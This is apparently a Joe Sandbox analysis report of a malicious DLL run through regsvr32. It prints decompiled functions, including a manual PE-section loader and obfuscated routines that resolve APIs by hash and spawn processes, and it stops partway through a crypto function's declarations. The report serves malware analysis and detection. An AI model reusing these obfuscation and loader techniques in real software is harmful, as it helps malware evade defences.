Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
String ID:
API String ID: 496899490-0
Opcode ID: db40230195121c03edd1d9de773089a9b398076d37fb16ef380e98a53d4696a6
Instruction ID: d2dedea389880cd6532a8cc41d1f31ca5a81082a511f3f96b23d25218acb7329
Opcode Fuzzy Hash: db40230195121c03edd1d9de773089a9b398076d37fb16ef380e98a53d4696a6
Instruction Fuzzy Hash: 5F31C1312043129FE720CF34CC8DA2A77E9FF84280B12891DE996C7651EB30F885CB10

Uniqueness

Uniqueness Score: -1.00%

Function 10016380, Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 27%

			E10016380(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t23;
				void* _t25;

				_push(0xc);
				_push(0x1002f780);
				_t8 = E1001984C(__ebx, __edi, __esi);
				_t23 =  *((intOrPtr*)(_t25 + 8));
				if(_t23 == 0) {
					L9:
					return E10019891(_t8);
				}
				if( *0x1005c984 != 3) {
					_push(_t23);
					L7:
					_push(0);
					_t8 = RtlFreeHeap( *0x1005ad4c); // executed
					_t31 = _t8;
					if(_t8 == 0) {
						_t10 = E10017D62(_t31);
						 *_t10 = E10017D27(GetLastError());
					}
					goto L9;
				}
				E1001A549(4);
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t13 = E1001A5C2(_t23);
				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t23);
					_push(_t13);
					E1001A5ED();
				}
				 *(_t25 - 4) = 0xfffffffe;
				_t8 = E100163D6();
				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t25 + 8)));
					goto L7;
				}
			}

0x10016380
0x10016382
0x10016387
0x1001638c
0x10016391
0x10016408
0x1001640d
0x1001640d
0x1001639a
0x100163df
0x100163e0
0x100163e0
0x100163e8
0x100163ee
0x100163f0
0x100163f2
0x10016405
0x10016407
0x00000000
0x100163f0
0x1001639e
0x100163a4
0x100163a9
0x100163af
0x100163b4
0x100163b6
0x100163b7
0x100163b8
0x100163be
0x100163bf
0x100163c6
0x100163cf
0x00000000
0x100163d1
0x100163d1
0x00000000
0x100163d1

APIs

__lock.LIBCMT ref: 1001639E

Part of subcall function 1001A549: __mtinitlocknum.LIBCMT ref: 1001A55D
Part of subcall function 1001A549: __amsg_exit.LIBCMT ref: 1001A569
Part of subcall function 1001A549: EnterCriticalSection.KERNEL32(00000001,00000001,?,1001C014,0000000D,1002FA58,00000008,1001C106,00000001,?,?,00000001,?,?,10017AE8,00000001), ref: 1001A571

___sbh_find_block.LIBCMT ref: 100163A9
___sbh_free_block.LIBCMT ref: 100163B8
RtlFreeHeap.NTDLL(00000000,?,1002F780,0000000C,1001BF6A,00000000,?,1001E73B,?,00000001,00000001,1001A4D3,00000018,1002F8C0,0000000C,1001A562), ref: 100163E8
GetLastError.KERNEL32(?,1001E73B,?,00000001,00000001,1001A4D3,00000018,1002F8C0,0000000C,1001A562,00000001,00000001,?,1001C014,0000000D,1002FA58), ref: 100163F9

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 933a214dfe2b721a1172918ae6127c9818b4b1158d9b2876c596c2397cc5b652
Instruction ID: 632ebcc47bfd7d50c2ae726889ea94072d2ceb4c664f4e9832d4c107bd8c1e1e
Opcode Fuzzy Hash: 933a214dfe2b721a1172918ae6127c9818b4b1158d9b2876c596c2397cc5b652
Instruction Fuzzy Hash: EE01D635805326EBEF20DBB4AC0AB9D3BF4EF053A0F214109F554AE091CB34EAC19A64

Uniqueness

Uniqueness Score: -1.00%

Function 040F2C24, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			E040F2C24(WCHAR* __ecx, void* __edx, intOrPtr _a12, intOrPtr _a20, int _a24, intOrPtr _a28, struct _STARTUPINFOW* _a32, intOrPtr _a40, intOrPtr _a44, WCHAR* _a52, struct _PROCESS_INFORMATION* _a56) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				struct _SECURITY_ATTRIBUTES* _v28;
				intOrPtr _v32;
				void* _t49;
				int _t56;
				WCHAR* _t60;

				_push(_a56);
				_t60 = __ecx;
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(_a12);
				_push(0);
				_push(0);
				_push(__ecx);
				E040EFE29(_t49);
				_v32 = 0x534833;
				_v28 = 0;
				_v24 = 0;
				_v8 = 0x70adbe;
				_v8 = _v8 >> 5;
				_v8 = _v8 << 0xa;
				_v8 = _v8 | 0x1d11c356;
				_v8 = _v8 ^ 0x1f145645;
				_v20 = 0xecea8a;
				_v20 = _v20 | 0x5baa72b8;
				_v20 = _v20 ^ 0x5be1d11d;
				_v16 = 0x76217f;
				_v16 = _v16 >> 0x10;
				_v16 = _v16 | 0xe98780dc;
				_v16 = _v16 ^ 0xe98c1e91;
				_v12 = 0xeb975;
				_v12 = _v12 ^ 0xd8138edb;
				_v12 = _v12 | 0x0b4171d5;
				_v12 = _v12 ^ 0xdb5d9300;
				E040DEB52(__ecx, __ecx, 0xb7160725, 0x75, 0xa2289af1);
				_t56 = CreateProcessW(_a52, _t60, 0, 0, _a24, 0, 0, 0, _a32, _a56); // executed
				return _t56;
			}

0x040f2c2c
0x040f2c31
0x040f2c33
0x040f2c36
0x040f2c37
0x040f2c3a
0x040f2c3d
0x040f2c3e
0x040f2c41
0x040f2c44
0x040f2c47
0x040f2c4a
0x040f2c4b
0x040f2c4e
0x040f2c4f
0x040f2c51
0x040f2c52
0x040f2c57
0x040f2c61
0x040f2c64
0x040f2c67
0x040f2c6e
0x040f2c72
0x040f2c76
0x040f2c7d
0x040f2c84
0x040f2c8b
0x040f2c92
0x040f2c99
0x040f2ca0
0x040f2ca4
0x040f2cab
0x040f2cb2
0x040f2cb9
0x040f2cc0
0x040f2cc7
0x040f2ce8
0x040f2d02
0x040f2d09

APIs

CreateProcessW.KERNELBASE(?,2E751909,00000000,00000000,00534833,00000000,00000000,00000000,?,?), ref: 040F2D02

Strings

3HS, xrefs: 040F2C57

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID: 3HS
API String ID: 963392458-330188696
Opcode ID: b0049691a906c617faab48a03f019d00495406e067b30e8a3afe4c22a13f3ee0
Instruction ID: 46c45af4f35cbdec3acf983704d5caf75b0ae74553d5ed31cc6b6dc10fdff78d
Opcode Fuzzy Hash: b0049691a906c617faab48a03f019d00495406e067b30e8a3afe4c22a13f3ee0
Instruction Fuzzy Hash: 8921F272800248BBDF159F96DC0ACDFBFB9EF85704F108188F915A2220D3B59A24DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 100021D0, Relevance: 3.1, APIs: 2, Instructions: 98
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E100021D0(intOrPtr __ecx, intOrPtr* _a4, void** _a8) {
				long _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				int _t67;

				_v28 = __ecx;
				if(_a8[2] != 0) {
					if((_a8[3] & 0x02000000) == 0) {
						asm("sbb ecx, ecx");
						_v16 =  ~( ~(_a8[3] & 0x20000000));
						asm("sbb eax, eax");
						_v24 =  ~( ~(_a8[3] & 0x40000000));
						asm("sbb edx, edx");
						_v12 =  ~( ~(_a8[3] & 0x80000000));
						_t39 = _v24 * 8; // 0x10056f20
						_v20 =  *((intOrPtr*)((_v16 << 4) + _t39 + 0x10056f20 + _v12 * 4));
						if((_a8[3] & 0x04000000) != 0) {
							_v20 = _v20 | 0x00000200;
						}
						_t67 = VirtualProtect( *_a8, _a8[2], _v20,  &_v8); // executed
						if(_t67 != 0) {
							return 1;
						} else {
							return 0;
						}
					}
					if( *_a8 == _a8[1] && (_a8[4] != 0 ||  *((intOrPtr*)( *_a4 + 0x38)) ==  *(_a4 + 0x30) || _a8[2] %  *(_a4 + 0x30) == 0)) {
						VirtualFree( *_a8, _a8[2], 0x4000); // executed
					}
					return 1;
				}
				return 1;
			}

0x100021d6
0x100021e0
0x100021f8
0x10002262
0x10002266
0x10002276
0x1000227a
0x1000228b
0x1000228f
0x1000229b
0x100022a8
0x100022b6
0x100022c1
0x100022c1
0x100022d9
0x100022e1
0x00000000
0x100022e3
0x00000000
0x100022e3
0x100022e1
0x10002205
0x10002244
0x10002244
0x00000000
0x1000224a
0x00000000

APIs

VirtualFree.KERNELBASE(00000000,?,00004000,?,10002468,00000001,00000000,?,10002C68,?,?,?,?,10002C68,00000000,00000000), ref: 10002244

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 47f32b032b7fce0672a30d9b107070a1881b22e5365e79d9d7a5c7562cbc9459
Instruction ID: def7816fd77fd5aef653724919a03fde70f7e86383ff2ba96e4cf8bb5acc80b5
Opcode Fuzzy Hash: 47f32b032b7fce0672a30d9b107070a1881b22e5365e79d9d7a5c7562cbc9459
Instruction Fuzzy Hash: 5A41B674600109AFEB44CF98C890BA9B7B6FB88350F25C659EC1A9F395C731EE41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 1001A305, Relevance: 3.0, APIs: 2, Instructions: 28
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E1001A305(intOrPtr _a4) {
				void* _t6;
				intOrPtr _t7;
				void* _t10;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x1005ad4c = _t6;
				if(_t6 != 0) {
					_t7 = E1001A2AA(__eflags);
					__eflags = _t7 - 3;
					 *0x1005c984 = _t7;
					if(_t7 != 3) {
						L5:
						__eflags = 1;
						return 1;
					} else {
						_t10 = E1001A57A(0x3f8);
						__eflags = _t10;
						if(_t10 != 0) {
							goto L5;
						} else {
							HeapDestroy( *0x1005ad4c);
							 *0x1005ad4c =  *0x1005ad4c & 0x00000000;
							goto L1;
						}
					}
				} else {
					L1:
					return 0;
				}
			}

0x1001a316
0x1001a31e
0x1001a323
0x1001a328
0x1001a32d
0x1001a330
0x1001a335
0x1001a35b
0x1001a35d
0x1001a35e
0x1001a337
0x1001a33c
0x1001a341
0x1001a344
0x00000000
0x1001a346
0x1001a34c
0x1001a352
0x00000000
0x1001a352
0x1001a344
0x1001a325
0x1001a325
0x1001a327
0x1001a327

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,1001796A,00000001,?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C), ref: 1001A316
HeapDestroy.KERNEL32(?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C,10017BA2,?), ref: 1001A34C

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Heap$CreateDestroy
String ID:
API String ID: 3296620671-0
Opcode ID: 2498113e0f0cb93b929c98f8b50cab2ed5fb389832bb0c331937e648ce874443
Instruction ID: 8ebff57b685a6f4636b50d0b354dfd0ee4d70228ae444a146c3f0929ed30e208
Opcode Fuzzy Hash: 2498113e0f0cb93b929c98f8b50cab2ed5fb389832bb0c331937e648ce874443
Instruction Fuzzy Hash: 93E06D71A193569EFB10AB308C9972536F4EB46386F104826F911CD4A0F7B0C6C09A01

Uniqueness

Uniqueness Score: -1.00%

Function 10002010, Relevance: 2.6, APIs: 2, Instructions: 115
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E10002010(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				void* _v12;
				long _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t76;
				void* _t127;

				_v28 = __ecx;
				_t3 = _a16 + 4; // 0x104e9
				_v20 =  *_t3;
				_t7 =  *_a16 + 0x14; // 0x4a8bb445
				_t9 = ( *_t7 & 0x0000ffff) + 0x18; // 0x10002c17
				_v24 =  *_a16 + _t9;
				_v8 = 0;
				while(1) {
					_t17 =  *_a16 + 6; // 0xe9000001
					if(_v8 >= ( *_t17 & 0x0000ffff)) {
						break;
					}
					if( *(_v24 + 0x10) != 0) {
						_t41 = _v24 + 0x14; // 0x4a8bb445
						_t43 = _v24 + 0x10; // 0x8b118bbc
						if(E10001FE0(_v28, _a8,  *_t41 +  *_t43) != 0) {
							_t47 = _v24 + 0x10; // 0x8b118bbc
							_t50 = _v24 + 0xc; // 0x4d8b0000
							_t76 = VirtualAlloc(_v20 +  *_t50,  *_t47, 0x1000, 4); // executed
							_v12 = _t76;
							if(_v12 != 0) {
								_t55 = _v24 + 0xc; // 0x4d8b0000
								_v12 = _v20 +  *_t55;
								_t58 = _v24 + 0x10; // 0x8b118bbc
								_t61 = _v24 + 0x14; // 0x4a8bb445
								E10001E60(_v12, _a4 +  *_t61,  *_t58);
								_t127 = _t127 + 0xc;
								 *((intOrPtr*)(_v24 + 8)) = _v12;
								L1:
								_v8 = _v8 + 1;
								_v24 = _v24 + 0x28;
								continue;
							}
							return 0;
						}
						return 0;
					}
					_v16 =  *((intOrPtr*)(_a12 + 0x38));
					if(_v16 <= 0) {
						L8:
						goto L1;
					}
					_t28 = _v24 + 0xc; // 0x4d8b0000
					_v12 = VirtualAlloc(_v20 +  *_t28, _v16, 0x1000, 4);
					if(_v12 != 0) {
						_t33 = _v24 + 0xc; // 0x4d8b0000
						_v12 = _v20 +  *_t33;
						 *((intOrPtr*)(_v24 + 8)) = _v12;
						E10001E10(_v12, 0, _v16);
						_t127 = _t127 + 0xc;
						goto L8;
					}
					return 0;
				}
				return 1;
			}

0x10002016
0x1000201c
0x1000201f
0x1000202c
0x10002030
0x10002034
0x10002037
0x10002052
0x10002057
0x1000205e
0x00000000
0x00000000
0x1000206b
0x100020d6
0x100020dc
0x100020ee
0x100020fe
0x10002108
0x1000210c
0x10002112
0x10002119
0x10002125
0x10002128
0x1000212e
0x10002138
0x10002140
0x10002145
0x1000214e
0x10002040
0x10002046
0x1000204f
0x00000000
0x1000204f
0x00000000
0x1000211b
0x00000000
0x100020f0
0x10002073
0x1000207a
0x100020ce
0x00000000
0x100020ce
0x1000208d
0x10002097
0x1000209e
0x100020ad
0x100020b0
0x100020b9
0x100020c6
0x100020cb
0x00000000
0x100020cb
0x00000000
0x100020a0
0x00000000

APIs

VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,10002BFF,00000000), ref: 10002091
VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,10008AC6,8B118BBC,?,10002BFF,00000000,10008AC6,?), ref: 1000210C

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1f005b19e3c441fc20b6c29efe2afaeec2d3b558fdbd29b30d99f40439f16acf
Instruction ID: c265c5d024e1aaa08d03296b5d335ffe068feccc9d90f6e2fd2d76d71ec68577
Opcode Fuzzy Hash: 1f005b19e3c441fc20b6c29efe2afaeec2d3b558fdbd29b30d99f40439f16acf
Instruction Fuzzy Hash: 4E51DEB4A0020ADFDB04CF94C591AAEB7F1FF48344F208598E915AB355D771EE91CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 10008860, Relevance: 1.5, APIs: 1, Instructions: 41
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E10008860(void* __eflags) {
				char* _v8;
				intOrPtr _v12;
				char _v16;
				char* _v20;
				void* __ebp;
				void* _t25;
				void* _t29;
				intOrPtr _t32;
				void* _t33;
				void* _t34;

				_v8 = E1001703B(_t25, _t29, _t33, _t34, 0x5f5e100);
				if(_v8 != 0) {
					_v12 = 0x5f5e100;
					_v16 = 0;
					_v20 = _v8;
					while(1) {
						__eflags = _v16 - 0x5f5e100;
						if(__eflags >= 0) {
							break;
						}
						 *_v20 = _v16;
						_v16 = _v16 + 1;
						_t32 = _v20 + 1;
						__eflags = _t32;
						_v20 = _t32;
					}
					_push(_v8); // executed
					E10016380(_t25, _t33, _t34, __eflags); // executed
					__eflags = _v16 - _v12;
					if(_v16 != _v12) {
						return 3;
					}
					return 0;
				}
				return 3;
			}

0x10008873
0x1000887a
0x10008883
0x1000888a
0x10008894
0x100088ab
0x100088ab
0x100088b2
0x00000000
0x00000000
0x100088ba
0x1000889f
0x100088a5
0x100088a5
0x100088a8
0x100088a8
0x100088c1
0x100088c2
0x100088cd
0x100088d0
0x00000000
0x100088d6
0x00000000
0x100088d2
0x00000000

APIs

_malloc.LIBCMT ref: 1000886B

Part of subcall function 1001703B: __FF_MSGBANNER.LIBCMT ref: 1001705E
Part of subcall function 1001703B: __NMSG_WRITE.LIBCMT ref: 10017065
Part of subcall function 1001703B: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1001E73B,?,00000001,00000001,1001A4D3,00000018,1002F8C0,0000000C,1001A562,00000001), ref: 100170B3

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: AllocateHeap_malloc
String ID:
API String ID: 501242067-0
Opcode ID: 40bd655b06e48b04370c20bd75be719fcb86c010ff12dc3827a327f63544bac9
Instruction ID: 9e6909d06ecd8ca97a2f758cde8d66f904c366c92fb4d9c13ba1bad92c8ee0bf
Opcode Fuzzy Hash: 40bd655b06e48b04370c20bd75be719fcb86c010ff12dc3827a327f63544bac9
Instruction Fuzzy Hash: 9A0178B4D0424CEFEB00CFA4C8446AEBBB4FB04354F60C8A9D9516B349E735AB00DB81

Uniqueness

Uniqueness Score: -1.00%

Function 040ED11A, Relevance: 1.5, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E040ED11A() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t39;

				_v24 = _v24 & 0x00000000;
				_v36 = 0x78f5c7;
				_v32 = 0xa12bb9;
				_v28 = 0x4eca09;
				_v8 = 0x8b256f;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x4a7d0011;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00073d60;
				_v20 = 0x1e549a;
				_v20 = _v20 + 0xffffad33;
				_v20 = _v20 ^ 0x00134b4f;
				_v16 = 0x8dd9dd;
				_v16 = _v16 << 3;
				_v16 = _v16 ^ 0x0460bc3c;
				_v12 = 0x358059;
				_v12 = _v12 + 0xb97b;
				_v12 = _v12 ^ 0x003502df;
				E040DEB52(_t39, _t39, 0x83891850, 0x1c, 0xa2289af1);
				ExitProcess(0);
			}

0x040ed120
0x040ed124
0x040ed12b
0x040ed132
0x040ed139
0x040ed140
0x040ed144
0x040ed14b
0x040ed14f
0x040ed156
0x040ed15d
0x040ed164
0x040ed16b
0x040ed172
0x040ed176
0x040ed17d
0x040ed184
0x040ed18b
0x040ed1ac
0x040ed1b6

APIs

ExitProcess.KERNEL32(00000000), ref: 040ED1B6

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 67c658d72cc930f45ab36e019061580956781c758de54a32820380ba4476f13f
Instruction ID: 833c239f50738aadcd2b43a9b61a4182cf9cd03aa02d66fd226bb0f431bd76ed
Opcode Fuzzy Hash: 67c658d72cc930f45ab36e019061580956781c758de54a32820380ba4476f13f
Instruction Fuzzy Hash: 8311E2B1C4430DEBDB54DFE5D94A6DEFBB0EB00749F108588D521B6250D3B89B489F91

Uniqueness

Uniqueness Score: -1.00%

Function 040F061D, Relevance: 1.3, APIs: 1, Instructions: 52
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E040F061D(signed int __ecx, WCHAR* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t44;
				int _t53;
				WCHAR* _t56;

				_push(_a12);
				_t56 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E040EFE29(_t44);
				_v24 = _v24 & 0x00000000;
				_v28 = 0xcd60b7;
				_v12 = 0x7257ab;
				_v12 = _v12 << 0xd;
				_v12 = _v12 + 0x8f69;
				_v12 = _v12 * 0x4c;
				_v12 = _v12 ^ 0x410f7a13;
				_v8 = 0x7b4696;
				_v8 = _v8 + 0xffff4950;
				_v8 = _v8 | 0x2a0f624b;
				_v8 = _v8 * 0x3a;
				_v8 = _v8 ^ 0xa0f3ec54;
				_v20 = 0x8a2161;
				_v20 = _v20 + 0xffff45ea;
				_v20 = _v20 ^ 0x1b6c7fa6;
				_v20 = _v20 ^ 0x1be8dede;
				_v16 = 0xdcc12a;
				_v16 = _v16 + 0xb9f4;
				_v16 = _v16 + 0xffffcfef;
				_v16 = _v16 ^ 0x00d9de04;
				E040DEB52(__ecx, __ecx, 0xb7861dce, 0x3e, 0xa2289af1);
				_t53 = lstrcmpiW(_a4, _t56); // executed
				return _t53;
			}

0x040f0624
0x040f0627
0x040f0629
0x040f062c
0x040f062f
0x040f0630
0x040f0631
0x040f0636
0x040f063d
0x040f0644
0x040f064b
0x040f064f
0x040f0667
0x040f066a
0x040f0671
0x040f0678
0x040f067f
0x040f068b
0x040f068e
0x040f0695
0x040f069c
0x040f06a3
0x040f06aa
0x040f06b1
0x040f06b8
0x040f06bf
0x040f06c6
0x040f06d9
0x040f06e5
0x040f06eb

APIs

lstrcmpiW.KERNELBASE(410F7A13,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 040F06E5

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
Instruction ID: 29cc62003404bddb78daf9e70e3b34d0c38b458f06bff9dd794fe8df59a9379f
Opcode Fuzzy Hash: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
Instruction Fuzzy Hash: 4F2102B1C01309ABDF14DFA9D9499DEBFB5FB10358F108198E529B6251D3B49B04CB90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 040D8636, Relevance: 39.9, Strings: 31, Instructions: 1175
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E040D8636() {
				signed int _v12;
				signed int _v20;
				intOrPtr _v24;
				signed int _v44;
				char _v56;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				char _v100;
				char _v108;
				signed int _v144;
				char _v152;
				char _v160;
				char _v164;
				char _v168;
				char _v172;
				char _v176;
				signed int _v180;
				signed int _v184;
				unsigned int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				unsigned int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				unsigned int _v268;
				unsigned int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				unsigned int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				unsigned int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				unsigned int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				signed int _v512;
				signed int _v516;
				signed int _v520;
				signed int _v524;
				unsigned int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				unsigned int _v556;
